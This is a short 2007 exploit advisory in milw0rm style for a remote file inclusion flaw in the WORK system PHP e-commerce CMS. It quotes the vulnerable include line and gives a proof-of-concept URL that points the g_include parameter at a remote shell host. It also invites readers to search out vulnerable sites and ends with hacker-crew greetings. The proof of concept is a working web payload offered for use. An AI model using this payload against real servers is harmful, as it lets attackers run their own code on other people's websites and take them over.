47 lines
No EOL
1.2 KiB
Text
47 lines
No EOL
1.2 KiB
Text
#####################################################################################
|
|
Rodrigo Duarte
|
|
Wuefez[AT]2die4.com ;D
|
|
|
|
WORK system e-commerce:
|
|
|
|
WORK PHP,Mysql content management system CMS e-commerce or not : ajax, workflow,
|
|
content,package,language,currency,country,price,stock,group user,CSS,banner,logo,
|
|
link,partner,forum,new,FAQ,event,calendar,invoice,mailing,supplier,RSS, webservices.
|
|
|
|
Vulnerable Script:
|
|
|
|
~ include_top.php
|
|
(Other scripts of this project are also vulnerable with $g_include)
|
|
|
|
Vulnerable Code:
|
|
|
|
include ($g_include."include_logo.php");
|
|
|
|
PoC:
|
|
|
|
http://example/[WORK_system_path]/include/include_top.php?g_include=http://shell
|
|
|
|
d0rk:
|
|
|
|
[your_creativity_here]
|
|
|
|
greetz:
|
|
|
|
Cocada, FoNSECA, maxim noob
|
|
SHiKaA, ZeUsSixSixSix, Arthurcmc
|
|
pizzer, rmeira and darkers.com.br
|
|
and for all the rest, i miss.........
|
|
|
|
EOF:
|
|
|
|
BRAZILIAN RAQUER!
|
|
MAGIC PEOPLE, VOODOO PEOPLE!
|
|
|
|
#####################################################################################
|
|
|
|
defined('G_SESSION_OR_COOKIE') or header( "Location: index.php" );
|
|
if ( !isset($g_db_prefix) ) header( "Location: index.php" );
|
|
|
|
The above isn't the correct way to block inclusions.
|
|
|
|
# milw0rm.com [2007-03-10] |